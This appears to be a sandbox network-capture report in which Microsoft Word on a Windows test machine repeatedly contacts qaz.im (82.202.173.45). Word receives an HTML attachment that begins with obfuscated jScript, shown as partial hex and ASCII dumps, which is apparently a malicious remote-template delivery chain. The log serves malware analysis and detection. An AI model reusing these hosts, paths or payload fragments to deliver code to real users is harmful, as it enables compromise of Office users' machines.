Sep 2, 2022 13:24:11.871222019 CEST53558688.8.8.8192.168.2.22
Sep 2, 2022 13:24:18.633838892 CEST4968853192.168.2.228.8.8.8
Sep 2, 2022 13:24:18.653536081 CEST53496888.8.8.8192.168.2.22
Sep 2, 2022 13:24:18.659006119 CEST5883653192.168.2.228.8.8.8
Sep 2, 2022 13:24:18.722076893 CEST53588368.8.8.8192.168.2.22
Sep 2, 2022 13:24:22.043364048 CEST5013453192.168.2.228.8.8.8
Sep 2, 2022 13:24:22.110351086 CEST53501348.8.8.8192.168.2.22
Sep 2, 2022 13:24:22.122073889 CEST5527553192.168.2.228.8.8.8
Sep 2, 2022 13:24:22.185585976 CEST53552758.8.8.8192.168.2.22
Sep 2, 2022 13:24:22.896694899 CEST5991553192.168.2.228.8.8.8
Sep 2, 2022 13:24:22.916980028 CEST53599158.8.8.8192.168.2.22
Sep 2, 2022 13:24:22.924175978 CEST5440853192.168.2.228.8.8.8
Sep 2, 2022 13:24:23.003745079 CEST53544088.8.8.8192.168.2.22
Sep 2, 2022 13:24:26.515650988 CEST5010853192.168.2.228.8.8.8
Sep 2, 2022 13:24:26.535551071 CEST53501088.8.8.8192.168.2.22
Sep 2, 2022 13:24:26.538368940 CEST5472353192.168.2.228.8.8.8
Sep 2, 2022 13:24:26.556077957 CEST53547238.8.8.8192.168.2.22

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Sep 2, 2022 13:24:11.853436947 CEST192.168.2.228.8.8.80xfbc4Standard query (0)qaz.imA (IP address)IN (0x0001)
Sep 2, 2022 13:24:18.633838892 CEST192.168.2.228.8.8.80xd915Standard query (0)qaz.imA (IP address)IN (0x0001)
Sep 2, 2022 13:24:18.659006119 CEST192.168.2.228.8.8.80xa259Standard query (0)qaz.imA (IP address)IN (0x0001)
Sep 2, 2022 13:24:22.043364048 CEST192.168.2.228.8.8.80xf2caStandard query (0)qaz.imA (IP address)IN (0x0001)
Sep 2, 2022 13:24:22.122073889 CEST192.168.2.228.8.8.80xdc64Standard query (0)qaz.imA (IP address)IN (0x0001)
Sep 2, 2022 13:24:22.896694899 CEST192.168.2.228.8.8.80x646cStandard query (0)qaz.imA (IP address)IN (0x0001)
Sep 2, 2022 13:24:22.924175978 CEST192.168.2.228.8.8.80x12f1Standard query (0)qaz.imA (IP address)IN (0x0001)
Sep 2, 2022 13:24:26.515650988 CEST192.168.2.228.8.8.80x25feStandard query (0)qaz.imA (IP address)IN (0x0001)
Sep 2, 2022 13:24:26.538368940 CEST192.168.2.228.8.8.80x9bb1Standard query (0)qaz.imA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
Sep 2, 2022 13:24:11.871222019 CEST8.8.8.8192.168.2.220xfbc4No error (0)qaz.im82.202.173.45A (IP address)IN (0x0001)
Sep 2, 2022 13:24:18.653536081 CEST8.8.8.8192.168.2.220xd915No error (0)qaz.im82.202.173.45A (IP address)IN (0x0001)
Sep 2, 2022 13:24:18.722076893 CEST8.8.8.8192.168.2.220xa259No error (0)qaz.im82.202.173.45A (IP address)IN (0x0001)
Sep 2, 2022 13:24:22.110351086 CEST8.8.8.8192.168.2.220xf2caNo error (0)qaz.im82.202.173.45A (IP address)IN (0x0001)
Sep 2, 2022 13:24:22.185585976 CEST8.8.8.8192.168.2.220xdc64No error (0)qaz.im82.202.173.45A (IP address)IN (0x0001)
Sep 2, 2022 13:24:22.916980028 CEST8.8.8.8192.168.2.220x646cNo error (0)qaz.im82.202.173.45A (IP address)IN (0x0001)
Sep 2, 2022 13:24:23.003745079 CEST8.8.8.8192.168.2.220x12f1No error (0)qaz.im82.202.173.45A (IP address)IN (0x0001)
Sep 2, 2022 13:24:26.535551071 CEST8.8.8.8192.168.2.220x25feNo error (0)qaz.im82.202.173.45A (IP address)IN (0x0001)
Sep 2, 2022 13:24:26.556077957 CEST8.8.8.8192.168.2.220x9bb1No error (0)qaz.im82.202.173.45A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • qaz.im

HTTPS Proxied Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.2.224917182.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:12 UTC0OUTOPTIONS /load/diy5AH/ HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: qaz.im
Content-Length: 0
Connection: Keep-Alive
2022-09-02 11:24:12 UTC0INHTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Set-Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session IDSource IPSource PortDestination IPDestination PortProcess
1192.168.2.224917282.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:18 UTC0OUTHEAD /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft Office Existence Discovery
Host: qaz.im
2022-09-02 11:24:19 UTC0INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:18 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"


Session IDSource IPSource PortDestination IPDestination PortProcess
10192.168.2.224918182.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:25 UTC22OUTGET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: qaz.im
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:25 UTC23INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"
2022-09-02 11:24:25 UTC23INData Raw: 3c 21 64 6f 63 54 59 70 65 20 48 54 4d 4c 3e 0d 0a 0d 0a 3c 68 54 6d 6c 3e 0d 0a 0d 0a 3c 62 4f 44 79 3e 0d 0a 0d 0a 3c 73 43 72 69 50 54 20 4c 61 6e 47 75 61 67 45 3d 22 6a 53 43 72 69 70 74 22 3e 0d 0a 0d 0a 2f 2f 41 76 39 47 77 56 76 5a 50 46 63 77 35 35 68 37 58 76 71 36 65 69 4e 77 33 33 77 6e 31 6b 4c 4d 4d 74 67 4b 6c 78 6d 48 4a 4c 71 6c 42 30 46 62 6b 53 70 53 6c 76 36 68 76 73 35 55 66 65 32 32 35 53 67 46 4a 58 5a 57 75 64 69 72 6c 6c 58 38 31 31 75 69 4c 78 64 4b 56 72 31 30 33 62 71 61 50 57 51 39 35 63 31 77 44 32 58 4d 4c 6c 4b 4e 4f 59 4f 34 77 43 6a 52 6f 74 33 58 68 30 5a 68 4c 7a 43 45 64 64 79 42 48 52 61 52 53 50 50 30 74 78 58 66 35 35 43 6a 73 74 52 43 41 47 78 30 75 6d 49 63 55 79 41 76 37 6c 39 45 64 37 5a 65 59 36 64 64 49 7a 6f
Data Ascii: <!docTYpe HTML><hTml><bODy><sCriPT LanGuagE="jSCript">//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo
2022-09-02 11:24:25 UTC39INData Raw: 64 62 31 6e 58 55 6b 61 50 4b 37 37 44 33 71 56 63 52 38 52 61 50 73 61 45 52 36 43 71 53 65 31 48 6c 41 50 54 4b 4a 6c 4a 49 39 39 68 6f 76 41 72 76 79 36 7a 77 78 4c 30 75 46 30 64 51 6a 6e 6f 59 67 43 39 42 7a 6f 73 58 64 33 70 72 4d 30 70 58 64 61 45 48 72 72 6d 66 6f 70 66 78 4e 39 72 30 53 51 6a 64 44 55 6c 34 56 36 6d 6b 5a 70 38 4b 30 39 51 78 30 75 42 6a 68 76 34 61 7a 72 36 39 50 50 4c 42 4e 62 63 76 64 61 67 30 77 4e 54 4c 30 35 6b 56 6d 48 75 38 6f 62 30 70 78 69 42 31 52 4f 41 4d 74 76 37 38 78 6d 68 38 73 54 54 61 58 68 4d 52 63 6b 61 76 33 38 65 46 6a 55 6c 65 53 66 4d 68 39 45 74 6b 4c 78 30 68 6e 72 6e 36 57 45 50 4a 76 35 73 36 4b 6e 39 4c 66 77 56 34 4d 58 33 6b 61 49 62 6c 6b 50 6a 44 37 4c 36 76 70 7a 33 65 35 35 52 69 5a 72 65 65 43
Data Ascii: db1nXUkaPK77D3qVcR8RaPsaER6CqSe1HlAPTKJlJI99hovArvy6zwxL0uF0dQjnoYgC9BzosXd3prM0pXdaEHrrmfopfxN9r0SQjdDUl4V6mkZp8K09Qx0uBjhv4azr69PPLBNbcvdag0wNTL05kVmHu8ob0pxiB1ROAMtv78xmh8sTTaXhMRckav38eFjUleSfMh9EtkLx0hnrn6WEPJv5s6Kn9LfwV4MX3kaIblkPjD7L6vpz3e55RiZreeC


Session IDSource IPSource PortDestination IPDestination PortProcess
11192.168.2.224918282.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:25 UTC42OUTHEAD /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: qaz.im
Content-Length: 0
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:25 UTC42INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"


Session IDSource IPSource PortDestination IPDestination PortProcess
12192.168.2.224918382.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:26 UTC43OUTOPTIONS /load/diy5AH/ HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: qaz.im
Content-Length: 0
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:26 UTC43INHTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session IDSource IPSource PortDestination IPDestination PortProcess
13192.168.2.224918482.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:26 UTC43OUTHEAD /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft Office Existence Discovery
Host: qaz.im
2022-09-02 11:24:26 UTC43INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:26 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"


Session IDSource IPSource PortDestination IPDestination PortProcess
14192.168.2.224918582.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:27 UTC44OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 6c 6f 61 64 2f 64 69 79 35 41 48 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a
Data Ascii: PROPFIND /load/diy5AH HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:27 UTC44INHTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session IDSource IPSource PortDestination IPDestination PortProcess
15192.168.2.224918682.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:27 UTC44OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 69 6e 64 65 78 2e 70 68 70 3f 61 3d 64 6f 77 6e 6c 6f 61 64 26 71 3d 66 69 6c 65 5f 6e 6f 74 5f 65 78 69 73 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a
Data Ascii: PROPFIND /index.php?a=download&q=file_not_exist HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:27 UTC44INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4473
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
2022-09-02 11:24:27 UTC45INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 50 72 69 76 61 74 65 20 46 69 6c 65 20 53 68 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66
Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


Session IDSource IPSource PortDestination IPDestination PortProcess
16192.168.2.224918782.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:27 UTC49OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 6c 6f 61 64 2f 64 69 79 35 41 48 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a
Data Ascii: PROPFIND /load/diy5AH HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:27 UTC49INHTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session IDSource IPSource PortDestination IPDestination PortProcess
17192.168.2.224918882.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:27 UTC50OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 69 6e 64 65 78 2e 70 68 70 3f 61 3d 64 6f 77 6e 6c 6f 61 64 26 71 3d 66 69 6c 65 5f 6e 6f 74 5f 65 78 69 73 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a
Data Ascii: PROPFIND /index.php?a=download&q=file_not_exist HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:28 UTC50INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4473
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
2022-09-02 11:24:28 UTC50INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 50 72 69 76 61 74 65 20 46 69 6c 65 20 53 68 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66
Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


Session IDSource IPSource PortDestination IPDestination PortProcess
18192.168.2.224918982.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:28 UTC55OUTGET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: qaz.im
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:28 UTC55INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:28 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"
2022-09-02 11:24:28 UTC55INData Raw: 3c 21 64 6f 63 54 59 70 65 20 48 54 4d 4c 3e 0d 0a 0d 0a 3c 68 54 6d 6c 3e 0d 0a 0d 0a 3c 62 4f 44 79 3e 0d 0a 0d 0a 3c 73 43 72 69 50 54 20 4c 61 6e 47 75 61 67 45 3d 22 6a 53 43 72 69 70 74 22 3e 0d 0a 0d 0a 2f 2f 41 76 39 47 77 56 76 5a 50 46 63 77 35 35 68 37 58 76 71 36 65 69 4e 77 33 33 77 6e 31 6b 4c 4d 4d 74 67 4b 6c 78 6d 48 4a 4c 71 6c 42 30 46 62 6b 53 70 53 6c 76 36 68 76 73 35 55 66 65 32 32 35 53 67 46 4a 58 5a 57 75 64 69 72 6c 6c 58 38 31 31 75 69 4c 78 64 4b 56 72 31 30 33 62 71 61 50 57 51 39 35 63 31 77 44 32 58 4d 4c 6c 4b 4e 4f 59 4f 34 77 43 6a 52 6f 74 33 58 68 30 5a 68 4c 7a 43 45 64 64 79 42 48 52 61 52 53 50 50 30 74 78 58 66 35 35 43 6a 73 74 52 43 41 47 78 30 75 6d 49 63 55 79 41 76 37 6c 39 45 64 37 5a 65 59 36 64 64 49 7a 6f
Data Ascii: <!docTYpe HTML><hTml><bODy><sCriPT LanGuagE="jSCript">//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo
2022-09-02 11:24:28 UTC71INData Raw: 64 62 31 6e 58 55 6b 61 50 4b 37 37 44 33 71 56 63 52 38 52 61 50 73 61 45 52 36 43 71 53 65 31 48 6c 41 50 54 4b 4a 6c 4a 49 39 39 68 6f 76 41 72 76 79 36 7a 77 78 4c 30 75 46 30 64 51 6a 6e 6f 59 67 43 39 42 7a 6f 73 58 64 33 70 72 4d 30 70 58 64 61 45 48 72 72 6d 66 6f 70 66 78 4e 39 72 30 53 51 6a 64 44 55 6c 34 56 36 6d 6b 5a 70 38 4b 30 39 51 78 30 75 42 6a 68 76 34 61 7a 72 36 39 50 50 4c 42 4e 62 63 76 64 61 67 30 77 4e 54 4c 30 35 6b 56 6d 48 75 38 6f 62 30 70 78 69 42 31 52 4f 41 4d 74 76 37 38 78 6d 68 38 73 54 54 61 58 68 4d 52 63 6b 61 76 33 38 65 46 6a 55 6c 65 53 66 4d 68 39 45 74 6b 4c 78 30 68 6e 72 6e 36 57 45 50 4a 76 35 73 36 4b 6e 39 4c 66 77 56 34 4d 58 33 6b 61 49 62 6c 6b 50 6a 44 37 4c 36 76 70 7a 33 65 35 35 52 69 5a 72 65 65 43
Data Ascii: db1nXUkaPK77D3qVcR8RaPsaER6CqSe1HlAPTKJlJI99hovArvy6zwxL0uF0dQjnoYgC9BzosXd3prM0pXdaEHrrmfopfxN9r0SQjdDUl4V6mkZp8K09Qx0uBjhv4azr69PPLBNbcvdag0wNTL05kVmHu8ob0pxiB1ROAMtv78xmh8sTTaXhMRckav38eFjUleSfMh9EtkLx0hnrn6WEPJv5s6Kn9LfwV4MX3kaIblkPjD7L6vpz3e55RiZreeC


Session IDSource IPSource PortDestination IPDestination PortProcess
19192.168.2.224919082.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:28 UTC74OUTHEAD /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: qaz.im
Content-Length: 0
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:29 UTC74INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"


Session IDSource IPSource PortDestination IPDestination PortProcess
2192.168.2.224917382.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:22 UTC1OUTOPTIONS /load/diy5AH HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: qaz.im
2022-09-02 11:24:22 UTC1INHTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
